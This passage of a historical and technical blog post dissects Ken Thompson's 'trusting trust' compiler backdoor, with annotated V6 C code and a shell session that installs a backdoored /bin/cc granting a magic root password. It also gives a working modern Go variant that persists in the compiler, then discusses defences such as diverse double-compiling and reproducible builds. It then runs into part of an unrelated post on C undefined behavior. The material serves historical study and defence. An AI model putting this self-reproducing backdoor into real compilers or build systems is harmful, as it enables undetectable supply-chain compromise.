goto l4; </pre> <tr> <td class=l> <p>Next target: <a href="cc.c#fflush">flushing output in <code>cc.c</code></a>. <td class=r><pre> l3: if(nihflg!=2) goto l4; s="fflush(obuf);"; for(i=0;i&lt;13;i++) if(s[i]!=p[i]) goto l4; </pre> <tr> <td class=l> <p>Insert end-of-file backdoor: call <code>repronih</code><br> to reproduce this very source file<br> (the definitions of <code>codenih</code> and <code>repronih</code>)<br> at the end of the now-backdoored text of <code>cc.c</code>. 
<td class=r><pre> p=+i; s="repronih();"; for(i=0;;i++) if(!(*p++=s[i])) break; nihflg++; l4:; } </pre> <tr> <td class=l> <p>Here the magic begins, as presented in the<br> Turing lecture. The <code>%0</code> is not valid C.<br> Instead, the script <code>rc</code> will replace the <code>%</code><br> with byte values for the text of this exact file,<br> to be used by <code>repronih</code>. <td class=r><pre> char nihstr[] { %0 }; </pre> <tr> <td class=l> <p>The magic continues.<br> <td class=r><pre> repronih() { int i,n,c; </pre> <tr> <td class=l> <p>If <code>nihflg</code> is not 3, this is not <code>cc.c</code><br> so don’t do anything. <td class=r><pre> if(nihflg!=3) return; </pre> <tr> <td class=l> <p>The most cryptic part of the whole program.<br> Scan over <code>nihstr</code> (indexed by <code>i</code>)<br> in five phases according to the value <code>n</code>: <div> <code>n=0</code>: emit literal text before “<code>%</code>”<br> <code>n=1</code>: emit octal bytes of text before “<code>%</code>”<br> <code>n=2</code>: emit octal bytes of “<code>%</code>” and rest of file<br> <code>n=3</code>: no output, looking for “<code>%</code>”<br> <code>n=4</code>: emit literal text after “<code>%</code>”<br> </div> <td class=r><pre> n=0; i=0; for(;;) switch(c=nihstr[i++]){ </pre> <tr> <td class=l> <p><code>045</code> is <code>'%'</code>, kept from appearing<br> except in the magic location inside <code>nihstr</code>.<br> Seeing <code>%</code> increments the phase.<br> The phase transition 0 → 1 rewinds the input.<br> Only phase 2 keeps processing the <code>%.</code> <td class=r><pre> case 045: n++; if(n==1) i=0; if(n!=2) continue; </pre> <tr> <td class=l> <p>In phases 1 and 2, emit octal byte value<br> (like <code>0123,</code>) to appear inside <code>nihstr</code>.</code><br> Note the comma to separate array elements,<br> so the <code>0</code> in <code>nihstr</code>’s <code>%0</code> above is a final,<br> terminating NUL byte for the array. <td class=r><pre> default: if(n==1||n==2){ putc('0',obuf); if(c>=0100) putc((c>>6)+'0',obuf); if(c>=010) putc(((c>>3)&7)+'0',obuf); putc((c&7)+'0',obuf); putc(',',obuf); putc('\n',obuf); continue; } </pre> <tr> <td class=l> <p>In phases 0 and 4, emit literal byte value,<br> to reproduce source file around the <code>%</code>.<br> <td class=r><pre> if(n!=3) putc(c,obuf); continue; </pre> <tr> <td class=l> <p>Reaching end of <code>nihstr</code> increments the phase<br> and rewinds the input.<br> The phase transition 4 → 5 ends the function.</code> <td class=r><pre> case 0: n++; i=0; if(n==5){ fflush(obuf); return; } } } </pre> <tr> <td class=l> <p>Now let’s read <code>rc</code>, a shell script. <td class=r><pre> % <b>cat rc</b> </pre> <tr> <td class=l> <p>Start the editor <code>ed</code> on <code>x.c</code>.<br> The V6 shell <code>sh</code> opened<br> input scripts on standard input,<br> sharing it with invoked commands,<br> so the lines that follow are for <code>ed</code>. <td class=r><pre> ed x.c </pre> <tr> <td class=l> <p>Delete all tabs from every line. <td class=r><pre> 1,$s/ //g </pre> <tr> <td class=l> <p>Write the modified file to <code>nih.c</code> and quit.<br> The shell will continue reading the input script. 
<td class=r><pre> w nih.c q </pre> <tr> <td class=l> <p>Octal dump bytes of <code>nih.c</code> into <code>x</code>.<br> The output looks like: </p> <div><code>% echo az | od -b<br> 0000000 141 172 012 000<br> 0000003 <br> %<br> </code></div> <p>Note the trailing <code>000</code> for an odd-sized input.<br> </code></div> </pre> <td class=r><pre> od -b nih.c >x </pre> <tr> <td class=l> <p>Back into <code>ed</code>, this time editing <code>x</code>. <td class=r><pre> ed x </pre> <tr> <td class=l> <p>Remove the leading file offsets, adding a <code>0</code><br> at the start of the first byte value. <td class=r><pre> 1,$s/^....... 0*/0/ </pre> <tr> <td class=l> <p>Replace each space before a byte value<br> with a newline and a leading <code>0</code>.<br> Now all the octal values are C octal constants. <td class=r><pre> 1,$s/ 0*/\ 0/g </pre> <tr> <td class=l> <p>Delete 0 values caused by odd-length padding<br> or by the final offset-only line. <td class=r><pre> g/^0$/d </pre> <tr> <td class=l> <p>Add trailing commas to each line. <td class=r><pre> 1,$s/$/,/ </pre> <tr> <td class=l> <p>Write <code>x</code> and switch to <code>nih.c</code>. <td class=r><pre> w x e nih.c </pre> <tr> <td class=l> <p>Move to and delete the magic <code>%0</code> line. <td class=r><pre> /%/d </pre> <tr> <td class=l> <p>Read <code>x</code> (the octal values) into the file there. <td class=r><pre> .-1r x </pre> <tr> <td class=l> <p>Add a trailing <code>0</code> to end the array. <td class=r><pre> .a 0 . </pre> <tr> <td class=l> <p>Write <code>nih.c</code> and quit. All done! <td class=r><pre> w nih.c q </pre> <tr> <td class=l> <p>Let’s run <code>rc</code>.<br> The numbers are <code>ed</code> printing file sizes<br> each time it reads or writes a file. <td class=r><pre> % <b>sh rc</b> 1314 1163 5249 6414 1163 6414 7576 </pre> <tr> <td class=l> <p>Let’s check the output, <code>nih.c</code>.<br> The tabs are gone and the octal bytes are there! <td class=r><pre> % <b>cat nih.c</b> nihflg; codenih() { char *p,*s; int i; if(pflag) return; <span class="reg">...</span> char nihstr[] { 0156, 0151, 0150, 0146, <span class="reg">...</span> 0175, 012, 0175, 012, 0 }; repronih() { int i,n,c; <span class="reg">...</span> </pre> <tr> <td class=l> <p>Let’s make an evil compiler,<br> applying the <code>codenih</code> changes by hand. <td class=r><pre> % <b>cp /usr/source/s1/cc.c cc.c</b> % <b>cp cc.c ccevil.c</b> % <b>ed ccevil.c</b> 12902 </pre> <tr> <td class=l> <p>Add <code>codenih</code> after <code>getline</code>. <td class=r><pre> <b>/getline/</b> while(getline()) { <b>s/$/ codenih();/</b> <b>.</b> while(getline()) { codenih(); </pre> <tr> <td class=l> <p>Add <code>repronih</code> after <code>fflush</code>. <td class=r><pre> <b>/fflush/</b> fflush(obuf); <b>s/$/ repronih();/</b> <b>.</b> fflush(obuf); repronih(); </pre> <tr> <td class=l> <p>Add <code>nih.c</code> at the end of the file. <td class=r><pre> <b>$r nih.c</b> 7576 <b>w</b> 20501 <b>q</b> </pre> <tr> <td class=l> <p>Build the evil and good code with the good <code>cc</code>. <td class=r><pre> % <b>cc ccevil.c; mv a.out ccevil</b> % <b>cc cc.c; mv a.out ccgood</b> % <b>ls -l ccevil ccgood</b> -rwxrwxrwx 1 ken 12918 Aug 14 22:19 ccevil -rwxrwxrwx 1 ken 10724 Aug 14 22:19 ccgood </pre> <tr> <td class=l> <p>The good compiler still compiles<br> the original <code>cc.c</code> correctly. 
<td class=r><pre> % <b>ccgood cc.c</b> % <b>ls -l a.out</b> -rwxrwxrwx 1 ken 10724 Aug 14 22:19 a.out </pre> <tr> <td class=l> <p>The evil compiler compiles<br> the original <code>cc.c</code> with the backdoor:<br> 12,918 bytes instead of 10,724. <td class=r><pre> % <b>ccevil cc.c</b> % <b>ls -l a.out</b> -rwxrwxrwx 1 ken 12918 Aug 14 22:19 a.out </pre> <tr> <td class=l> <p>The evil compilers don’t match exactly,<br> but only because the binary contains the name of<br> the source file (<code>ccevil.c</code> versus <code>cc.c</code>).<br> One more round will converge them. <td class=r><pre> % <b>cmp a.out ccevil</b> a.out ccevil differ: char 9428, line 377 % <b>cmp -l a.out ccevil</b> 9428 56 145 9429 157 166 9430 0 151 9431 0 154 9432 0 56 9433 0 157 % <b>cp a.out ccevil</b> % <b>ccevil cc.c</b> % <b>cmp a.out ccevil</b> % </pre> <tr> <td class=l> <p>Let’s install the evil compiler. <td class=r><pre> % <b>su</b> password: <b>root</b> # <b>cp ccevil /bin/cc</b> </pre> <tr> <td class=l> <p>Let’s rebuild everything from clean sources.<br> The compiler still contains the backdoor.<br> <td class=r><pre> # <b>cc /usr/source/s1/cc.c</b> # <b>cp a.out /bin/cc</b> # <b>ls -l /bin/cc</b> -rwxrwxr-x 1 bin 12918 Aug 14 22:30 /bin/cc # <b>cc /usr/source/s1/login.c</b> # <b>cp a.out /bin/login</b> # ^D </pre> <tr> <td class=l> <p>Now we can log in as root<br> with the magic password. <td class=r><pre> % ^D login: <b>root</b> Password: <b>codenih</b> # <b>who</b> root tty8 Aug 14 22:32 # </pre> </table> <a class=anchor href="#timeline"><h2 id="timeline">Timeline</h2></a> <p> This code can be dated to some time in the one-year period from June 1974 to June 1975, probably early 1975. </p> <p> The code does not work in V5 Unix, released in June 1974. At the time, the C preprocessor code only processed input files that began with the first character ‘#’. The backdoor is in the preprocessor, and the V5 <code>cc.c</code> did not start with ‘#’ and so wouldn’t have been able to modify itself. The <a href="https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf">Air Force review of Multics security</a> that Ken credits for inspiring the backdoor is also dated June 1974. So the code post-dates June 1974. </p> <p> Although it wasn’t used in V6, the archive records the modification time (mtime) of each file it contains. We can read the mtime directly from the archive using a modern Unix system: </p> <pre> % hexdump -C nih.a 00000000 6d ff 78 2e 63 00 00 00 00 00 <b>46 0a 6b 64</b> 06 b6 |m.x.c.....F.kd..| 00000010 22 05 6e 69 68 66 6c 67 3b 0a 63 6f 64 65 6e 69 |".nihflg;.codeni| ... 00000530 7d 0a 7d 0a 72 63 00 00 00 00 00 00 <b>46 0a eb 5e</b> |}.}.rc......F..^| 00000540 06 b6 8d 00 65 64 20 78 2e 63 0a 31 2c 24 73 2f |....ed x.c.1,$s/| % date -r 0x0a46646b # BSD date. On Linux: date -d @$((0x0a46646b)) Thu Jun 19 00:49:47 EDT 1975 % date -r 0x0a465eeb Thu Jun 19 00:26:19 EDT 1975 % </pre> <p> So the code was done by June 1975. 
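<p>
(The bold bytes are a V6 long integer stored in PDP-11 order: two little-endian 16-bit words, most significant word first, which is how <code>46 0a 6b 64</code> becomes <code>0x0a46646b</code>. As a cross-check, here is a minimal C++ sketch of that decoding; it assumes only that <code>time_t</code> counts seconds from the Unix epoch, as on any modern system.)
<pre>
#include &lt;cstdint&gt;
#include &lt;cstdio&gt;
#include &lt;ctime&gt;

int main() {
    // The mtime bytes for x.c, exactly as they appear in the archive header above.
    unsigned char b[4] = {0x46, 0x0a, 0x6b, 0x64};

    // A V6 (PDP-11) 32-bit integer is two little-endian 16-bit words,
    // stored most significant word first.
    uint32_t hi = uint32_t(b[1])&lt;&lt;8 | b[0]; // 0x0a46
    uint32_t lo = uint32_t(b[3])&lt;&lt;8 | b[2]; // 0x646b
    time_t mtime = time_t(hi)&lt;&lt;16 | lo;     // 0x0a46646b = 172385387

    printf("%s", asctime(gmtime(&amp;mtime))); // Thu Jun 19 04:49:47 1975 (UTC)
}
</pre>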
</p> <a class=anchor href="#deployment"><h2 id="deployment">Controlled Deployment</h2></a> <p> In addition to the quote above from the Q&A, the story of the deployment of the backdoor has been told publicly many times (<a href="https://groups.google.com/g/net.lang.c/c/kYhrMYcOd0Y/m/u_D2lWAUCQoJ">1</a> <a href="https://niconiconi.neocities.org/posts/ken-thompson-really-did-launch-his-trusting-trust-trojan-attack-in-real-life/">2</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024478.html">3</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024485.html">4</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024486.html">5</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024487.html">6</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-November/024657.html">7</a>), sometimes with conflicting minor details. Based on these many tellings, it seems clear that it was the <a href="https://en.wikipedia.org/wiki/PWB/UNIX">PWB group</a> (not <a href="https://gunkies.org/wiki/USG_UNIX">USG</a> as sometimes reported) that was induced to copy the backdoored C compiler, that eventually the login program on that system got backdoored too, that PWB discovered something was amiss because the compiler got bigger each time it compiled itself, and that eventually they broke the reproduction and ended up with a clean compiler. <p> John Mashey tells the story of the PWB group obtaining and discovering the backdoor and then him overhearing Ken and Robert H. Morris discussing it (<a href="https://groups.google.com/g/net.lang.c/c/W4Oj3EVAvNc/m/XPAtApNycLUJ">1</a> <a href="https://mstdn.social/@JohnMashey/109991275086879095">2</a> <a href="https://archive.computerhistory.org/resources/access/text/2018/10/102738835-05-01-acc.pdf">3</a> (pp. 29-30) <a href="https://www.youtube.com/watch?v=Vd7aH2RrcTc&t=4776s">4</a>). In Mashey’s telling, PWB obtained the backdoor weeks after he read John Brunner’s classic book <i>Shockwave Rider</i>, which was published in early 1975. (It appeared in the “New Books” list in the <i>New York Times</i> on March 5, 1975 (p. 37).) <p> All tellings of this story agree that the compiler didn’t make it any farther than PWB. Eric S. Raymond’s Jargon File contains <a href="http://www.catb.org/jargon/html/B/back-door.html">an entry for backdoor</a> with rumors to the contrary. After describing Ken’s work, it says:</p> <blockquote> Ken says the crocked compiler was never distributed. Your editor has heard two separate reports that suggest that the crocked login did make it out of Bell Labs, notably to BBN, and that it enabled at least one late-night login across the network by someone using the login name “kt”. </blockquote> <p>I mentioned this to Ken, and he said it could not have gotten to BBN. The technical details don’t line up either: as we just saw, the login change only accepts “codenih” as a password for an account that already exists. So the Jargon File story is false. </p> <p>Even so, it turns out that the backdoor did leak out in one specific sense. In 1997, Dennis Ritchie gave Warren Toomey (curator of the TUHS archive) a collection of old tape images. Some bits were posted then, and others were held back. In July 2023, Warren <a href="https://www.tuhs.org/Archive/Applications/Dennis_Tapes/">posted</a> and <a href="https://www.tuhs.org/pipermail/tuhs/2023-July/028590.html">announced</a> the full set. 
One of the tapes contains various files from Ken, which Dennis had described as “A bunch of interesting old ken stuff (eg a version of the units program from the days when the dollar fetched 302.7 yen).” Unnoticed in those files is <code>nih.a</code>, dated July 3, 1975. When I wrote to Ken, he sent me a slightly different <code>nih.a</code>: it contained the exact same files, but dated January 28, 1998, and in the modern textual archive format rather than the binary V6 format. The V6 simulator contains the <code>nih.a</code> from Dennis’s tapes. </p> <a class=anchor href="#buggy"><h2 id="buggy">A Buggy Version</h2></a> <p> The backdoor was noticed because the compiler got one byte larger each time it compiled itself. About a decade ago, Ken told me that it was an extra NUL byte added to a string each time, “just a bug.” We can see which string constant it must have been (<code>nihstr</code>), but the version we just built does not have that bug—Ken says he didn’t save the buggy version. An interesting game would be to try to reconstruct the most plausible diff that reintroduces the bug. </p> <p> It seems to me that to add an extra NUL byte each time, you need to use <code>sizeof</code> to decide when to stop the iteration, instead of stopping at the first NUL. My best attempt is: </p> <pre> repronih() { int i,n,c; if(nihflg!=3) return; <span class=del>- n=0;</span> <span class=del>- i=0;</span> <span class=del>- for(;;)</span> <span class=ins>+ for(n=0; n&lt;5; n++)</span> <span class=ins>+ for(i=0; i&lt;sizeof nihstr; )</span> switch(c=nihstr[i++]){ case 045: n++; if(n==1) i=0; if(n!=2) continue; default: if(n==1||n==2){ putc('0',obuf); if(c>=0100) putc((c>>6)+'0',obuf); if(c>=010) putc(((c>>3)&7)+'0',obuf); putc((c&7)+'0',obuf); putc(',',obuf); putc('\n',obuf); continue; } if(n!=3) putc(c,obuf); continue; <span class=del>- case 0:</span> <span class=del>- n++;</span> <span class=del>- i=0;</span> <span class=del>- if(n==5){</span> <span class=del>- fflush(obuf);</span> <span class=del>- return;</span> <span class=del>- }</span> } <span class=ins>+ fflush(obuf);</span> } </pre> <p> I doubt this was the actual buggy code, though: it’s too structured compared to the fixed version. And if the code had been written this way, it would have been easier to remove the 0 being added in the <code>rc</code> script than to complicate the code. But maybe. </p> <p> Also note that the compiler cannot get one byte larger each time it compiles itself, because V6 Unix binaries were rounded up to a 2-byte boundary. While <code>nihstr</code> gets one byte larger each time, the compiler binary gets two bytes larger every second time. </p> <a class=anchor href="#modern"><h2 id="modern">A Modern Version</h2></a> <p> Even seeing the code run in the V6 simulator, it can be easy to mentally dismiss this kind of backdoor as an old problem. Here is a more modern variant. </p> <p> The Go compiler reads input files using a routine called <code>Parse</code> in the package <code>cmd/compile/internal/syntax</code>. The input is abstracted as an <code>io.Reader</code>, so if we want to replace the input, we need to interpose a new reader. 
We can do that easily enough: </p> <pre> var p parser <span class=ins>+ src = &evilReader{src: src}</span> p.init(base, src, errh, pragh, mode) </pre> <p> Then we need to implement <code>evilReader</code>, which is not too difficult either: </p> <pre> type evilReader struct { src io.Reader data []byte err error } func (r *evilReader) Read(b []byte) (int, error) { if r.data == nil { data, err := io.ReadAll(r.src) s := string(data) if evilContains(s, "package main") && evilContains(s, "\"hello, world\\n\"") { s = evilReplace(s, "\"hello, world\\n\"", "\"backdoored!\\n\"") } if evilContains(s, "package syntax") && evilContains(s, "\nfunc Parse(base *PosBase, src io.Reader") { s = evilReplace(s, "p.init(base, src, errh, pragh, mode)", "src=&evilReader{src:src}; p.init(base, src, errh, pragh, mode)") s += evilSource() } r.data = []byte(s) r.err = err } if r.err != nil { return 0, r.err } n := copy(b, r.data) r.data = r.data[n:] if n == 0 { return 0, io.EOF } return n, nil } </pre> <p> The first replacement rewrites a “hello, world” program to a “backdoored!” program. The second replacement reproduces the change inside the compiler. To make this work inside the compiler, we need <code>evilSource</code> to return the source code of the <code>evilReader</code>, which we know how to do. The <code>evilContains</code> and <code>evilReplace</code> functions are reimplementations of <code>strings.Contains</code> and <code>strings.Replace</code>, since the code in question does not import <code>strings</code>, and the build system may not have provided it for the compiler to import. </p> <p> Completing the code: </p> <pre> func evilIndex(s, t string) int { for i := 0; i &lt; len(s)-len(t); i++ { if s[i:i+len(t)] == t { return i } } return -1 } func evilContains(s, t string) bool { return evilIndex(s, t) >= 0 } func evilReplace(s, old, new string) string { i := evilIndex(s, old) if i &lt; 0 { return s } return s[:i] + new + s[i+len(old):] } func evilSource() string { return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n" } var evilText = <span class=string>` type evilReader struct { src io.Reader data []byte err error } ... func evilSource() string { return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n" } `</span> </pre> <p> Now we can install it, delete the source code changes, and install the compiler from clean sources. The change persists: </p> <pre> % go install cmd/compile % git stash Saved working directory ... % git diff # source is clean! % go install cmd/compile % cat >x.go package main func main() { print("hello, world\n") } ^D % go run x.go backdoored! % </pre> <a class=anchor href="#reflections"><h2 id="reflections">Reflections on Reflections</h2></a> <p>With all that experience behind us, a few observations from the vantage point of 2023. <p><a class=anchor href="#short"><b id=short>It’s short!</b></a> When Ken sent me <code>nih.a</code> and I got it running, my immediate reaction was disbelief at the size of the change: 99 lines of code, plus a 20-line shell script. If you already know how to make a program print itself, the biggest surprise is that there are no surprises! <p> It’s one thing to say “I know how to do it in theory” and quite another to see how small and straightforward the backdoor is in practice. In particular, hooking into source code reading makes it trivial. Somehow, I’d always imagined some more complex pattern matching on an internal representation in the guts of the compiler, not a textual substitution. 
Seeing it run, and seeing how tiny it is, really drives home how easy it would be to make a change like this and how important it is to build from trusted sources using trusted tools. <p> I don’t say any of this to put down Ken’s doing it in the first place: it seems easy <i>because</i> he did it and explained it to us. But it’s still very little code for an extremely serious outcome. <p><a class=anchor href="#go"><b id=go>Bootstrapping Go</b></a>. In the early days of working on and talking about <a href="https://go.dev/">Go</a>, people often asked us why the Go compiler was written in C, not Go. The real reason is that we wanted to spend our time making Go a good language for distributed systems and not on making it a good language for writing compilers, but we would also jokingly respond that people wouldn’t trust a self-compiling compiler from Ken. After all, he had ended his Turing lecture by saying: </p> <blockquote> The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. </blockquote> <p> Today, however, the Go compiler does compile itself, and that prompts the important question of why it should be trusted, especially when a backdoor is so easy to add. The answer is that we have never required that the compiler rebuild itself. Instead the compiler always builds from an earlier released version of the compiler. This way, anyone can reproduce the current binaries by starting with Go 1.4 (written in C), using Go 1.4 to compile Go 1.5, Go 1.5 to compile Go 1.6, and so on. There is no point in the cycle where the compiler is required to compile itself, so there is no place for a binary-only backdoor to hide. In fact, we recently published programs to make it easy to rebuild and verify the Go toolchains, and we demonstrated how to use them to verify one version of Ubuntu’s Go toolchain without using Ubuntu at all. See “<a href="https://go.dev/blog/rebuild">Perfectly Reproducible, Verified Go Toolchains</a>” for details. </p> <p><a class=anchor href="#ddc"><b id=ddc>Bootstrapping Trust</b></a>. An important advancement since 1983 is that we know a defense against this backdoor, which is to build the compiler source two different ways. <p> <img name="ddc" class="center pad" width=482 height=245 src="ddc.png" srcset="ddc.png 1x, ddc@2x.png 2x"> <p> Specifically, suppose we have the suspect binary – compiler 1 – and its source code. First, we compile that source code with a trusted second compiler, compiler 2, producing compiler 2.1. If everything is on the up-and-up, compiler 1 and compiler 2.1 should be semantically equivalent, even though they will be very different at the binary level, since they were generated by different compilers. Also, compiler 2.1 cannot contain a binary-only backdoor inserted by compiler 1, since it wasn’t compiled with that compiler. Now we compile the source code again with both compiler 1 and compiler 2.1. If they really are semantically equivalent, then the outputs, compilers 1.1 and 2.1.1, should be bit-for-bit identical. If that’s true, then we’ve established that compiler 1 does not insert any backdoors when compiling itself. </p> <p> The great thing about this process is that we don’t even need to know which of compiler 1 and 2 might be backdoored. If compilers 1.1 and 2.1.1 are identical, then they’re either both clean or both backdoored the same way. 
If they are independent implementations from independent sources, the chance of both being backdoored the same way is far less likely than the chance of compiler 1 being backdoored. We’ve bootstrapped trust in compiler 1 by comparing it against compiler 2, and vice versa. </p> <p> Another great thing about this process is that compiler 2 can be a custom, small translator that’s incredibly slow and not fully general but easier to verify and trust. All that matters is that it can run well enough to produce compiler 2.1, and that the resulting code runs well enough to produce compiler 2.1.1. At that point, we can switch back to the fast, fully general compiler 1. </p> <p> This approach is called “diverse double-compiling,” and the definitive reference is <a href="https://dwheeler.com/trusting-trust/">David A. Wheeler’s PhD thesis and related links</a>. </p> <p><a class=anchor href="#repro"><b id=repro>Reproducible Builds</b></a>. Diverse double-compiling and any other verifying of binaries by rebuilding source code depends on builds being reproducible. That is, the same inputs should produce the same outputs. Computers being deterministic, you’d think this would be trivial, but in modern systems it is not. We saw a tiny example above, where compiling the code as <code>ccevil.c</code> produced a different binary than compiling the code as <code>cc.c</code> because the compiler embedded the file name in the executable. Other common unwanted build inputs include the current time, the current directory, the current user name, and many others, making a reproducible build far more difficult than it should be. The <a href="https://reproducible-builds.org/">Reproducible Builds</a> project collects resources to help people achieve this goal. </p> <p><a class=anchor href="#modern"><b id=modern>Modern Security</b></a>. In many ways, computing security has regressed since the Air Force report on Multics was written in June 1974. It suggested requiring source code as a way to allow inspection of the system on delivery, and it raised this kind of backdoor as a potential barrier to that inspection. Half a century later, we all run binaries with no available source code at all. Even when source is available, as in open source operating systems like Linux, approximately no one checks that the distributed binaries match the source code. The programming environments for languages like Go, NPM, and Rust make it trivial to download and run source code published by <a href="deps">strangers on the internet</a>, and again almost no one is checking the code, until there is a problem. No one needs Ken’s backdoor: there are far easier ways to mount a supply chain attack. <p> On the other hand, given all our reckless behavior, there are far fewer problems than you would expect. Quite the opposite: we trust computers with nearly every aspect of our lives, and for the most part nothing bad happens. Something about our security posture must be better than it seems. Even so, it might be nicer to live in a world where the only possible attacks required the sophistication of approaches like Ken’s (like in this <a href="https://www.teamten.com/lawrence/writings/coding-machines/">excellent science fiction story</a>). </p> <p> We still have work to do. </p> C and C++ Prioritize Performance over Correctness tag:research.swtch.com,2012:research.swtch.com/ub 2023-08-18T12:00:00-04:00 2023-08-18T12:02:00-04:00 The meaning of “undefined behavior” has changed significantly since its introduction in the 1980s. 
<p> The original ANSI C standard, C89, introduced the concept of “undefined behavior,” which was used both to describe the effect of outright bugs like accessing memory in a freed object and also to capture the fact that existing implementations differed about handling certain aspects of the language, including use of uninitialized values, signed integer overflow, and null pointer handling. <p> The C89 spec defined undefined behavior (in section 1.6) as:<blockquote> <p> Undefined behavior—behavior, upon use of a nonportable or erroneous program construct, of erroneous data, or of indeterminately-valued objects, for which the Standard imposes no requirements. Permissible undefined behavior ranges from ignoring the situation completely with unpredictable results, to behaving during translation or program execution in a documented manner characteristic of the environment (with or without the issuance of a diagnostic message), to terminating a translation or execution (with the issuance of a diagnostic message).</blockquote> <p> Lumping both non-portable and buggy code into the same category was a mistake. As time has gone on, the way compilers treat undefined behavior has led to more and more unexpectedly broken programs, to the point where it is becoming difficult to tell whether any program will compile to the meaning in the original source. This post looks at a few examples and then tries to make some general observations. In particular, today’s C and C++ prioritize performance to the clear detriment of correctness. <a class=anchor href="#uninit"><h2 id="uninit">Uninitialized variables</h2></a> <p> C and C++ do not require variables to be initialized on declaration (explicitly or implicitly) like Go and Java. Reading from an uninitialized variable is undefined behavior. <p> In a <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">blog post</a>, Chris Lattner (creator of LLVM and Clang) explains the rationale:<blockquote> <p> <b>Use of an uninitialized variable</b>: This is commonly known as source of problems in C programs and there are many tools to catch these: from compiler warnings to static and dynamic analyzers. This improves performance by not requiring that all variables be zero initialized when they come into scope (as Java does). For most scalar variables, this would cause little overhead, but stack arrays and malloc’d memory would incur a memset of the storage, which could be quite costly, particularly since the storage is usually completely overwritten.</blockquote> <p> Early C compilers were too crude to detect use of uninitialized basic variables like integers and pointers, but modern compilers are dramatically more sophisticated. They could absolutely react in these cases by “terminating a translation or execution (with the issuance of a diagnostic message),” which is to say reporting a compile error. Or, if they were worried about not rejecting old programs, they could insert a zero initialization with, as Lattner admits, little overhead. But they don’t do either of these. Instead, they just do whatever they feel like during code generation. <p> <p> For example, here’s a simple C++ program with an uninitialized variable (a bug): <pre>#include &lt;stdio.h&gt; int main() { for(int i; i &lt; 10; i++) { printf("%d\n", i); } return 0; } </pre> <p> If you compile this with <code>clang++</code> <code>-O1</code>, it deletes the loop entirely: <code>main</code> contains only the <code>return</code> <code>0</code>. 
In effect, Clang has noticed the uninitialized variable and chosen not to report the error to the user but instead to pretend <code>i</code> is always initialized above 10, making the loop disappear. <p> It is true that if you compile with <code>-Wall</code>, then Clang does report the use of the uninitialized variable as a warning. This is why you should always build with and fix warnings in C and C++ programs. But not all compiler-optimized undefined behaviors are reliably reported as warnings. <a class=anchor href="#overflow"><h2 id="overflow">Arithmetic overflow</h2></a> <p> At the time C89 was standardized, there were still legacy <a href="https://en.wikipedia.org/wiki/Ones%27_complement">ones’-complement computers</a>, so ANSI C could not assume the now-standard two’s-complement representation for negative numbers. In two’s complement, an <code>int8</code> −1 is 0b11111111; in ones’ complement that’s −0, while −1 is 0b11111110. This meant that operations like signed integer overflow could not be defined, because<blockquote> <p> <code>int8</code> 127+1 = 0b01111111+1 = 0b10000000</blockquote> <p> is −127 in ones’ complement but −128 in two’s complement. That is, signed integer overflow was non-portable. Declaring it undefined behavior let compilers escalate the behavior from “non-portable”, with one of two clear meanings, to whatever they feel like doing. For example, a common thing programmers expect is that you can test for signed integer overflow by checking whether the result is less than one of the operands, as in this program: <pre>#include &lt;stdio.h&gt; int f(int x) { if(x+100 &lt; x) printf("overflow\n"); return x+100; } </pre> <p> Clang optimizes away the <code>if</code> statement. The justification is that since signed integer overflow is undefined behavior, the compiler can assume it never happens, so <code>x+100</code> must never be less than <code>x</code>. Ironically, this program would correctly detect overflow on both ones’-complement and two’s-complement machines if the compiler would actually emit the check. <p> In this case, <code>clang++</code> <code>-O1</code> <code>-Wall</code> prints no warning while it deletes the <code>if</code> statement, and neither does <code>g++</code>, although I seem to remember it used to, perhaps in subtly different situations or with different flags. <p> For C++20, the <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2018/p0907r0.html">first version of proposal P0907</a> suggested standardizing that signed integer overflow wraps in two’s complement. The original draft gave a very clear statement of the history of the undefined behavior and the motivation for making a change:<blockquote> <p> [C11] Integer types allows three representations for signed integral types: <ul> <li> Signed magnitude <li> Ones’ complement <li> Two’s complement</ul> <p> See §4 C Signed Integer Wording for full wording. <p> C++ inherits these three signed integer representations from C. To the author’s knowledge no modern machine uses both C++ and a signed integer representation other than two’s complement (see §5 Survey of Signed Integer Representations). None of [MSVC], [GCC], and [LLVM] support other representations. This means that the C++ that is taught is effectively two’s complement, and the C++ that is written is two’s complement. It is extremely unlikely that there exist any significant code base developed for two’s complement machines that would actually work when run on a non-two’s complement machine. 
<p> The C++ that is spec’d, however, is not two’s complement. Signed integers currently allow for trap representations, extra padding bits, integral negative zero, and introduce undefined behavior and implementation-defined behavior for the sake of this extremely abstract machine. <p> Specifically, the current wording has the following effects: <ul> <li> Associativity and commutativity of integers is needlessly obtuse. <li> Naïve overflow checks, which are often security-critical, often get eliminated by compilers. This leads to exploitable code when the intent was clearly not to and the code, while naïve, was correctly performing security checks for two’s complement integers. Correct overflow checks are difficult to write and equally difficult to read, exponentially so in generic code. <li> Conversion between signed and unsigned are implementation-defined. <li> There is no portable way to generate an arithmetic right-shift, or to sign-extend an integer, which every modern CPU supports. <li> constexpr is further restrained by this extraneous undefined behavior. <li> Atomic integral are already two’s complement and have no undefined results, therefore even freestanding implementations already support two’s complement in C++.</ul> <p> Let’s stop pretending that the C++ abstract machine should represent integers as signed magnitude or ones’ complement. These theoretical implementations are a different programming language, not our real-world C++. Users of C++ who require signed magnitude or ones’ complement integers would be better served by a pure-library solution, and so would the rest of us.</blockquote> <p> In the end, the C++ standards committee put up “strong resistance against” the idea of defining signed integer overflow the way every programmer expects; the undefined behavior remains. <a class=anchor href="#loops"><h2 id="loops">Infinite loops</h2></a> <p> A programmer would never accidentally cause a program to execute an infinite loop, would they? Consider this program: <pre>#include &lt;stdio.h&gt; int stop = 1; void maybeStop() { if(stop) for(;;); } int main() { printf("hello, "); maybeStop(); printf("world\n"); } </pre> <p> This seems like a completely reasonable program to write. Perhaps you are debugging and want the program to stop so you can attach a debugger. Changing the initializer for <code>stop</code> to <code>0</code> lets the program run to 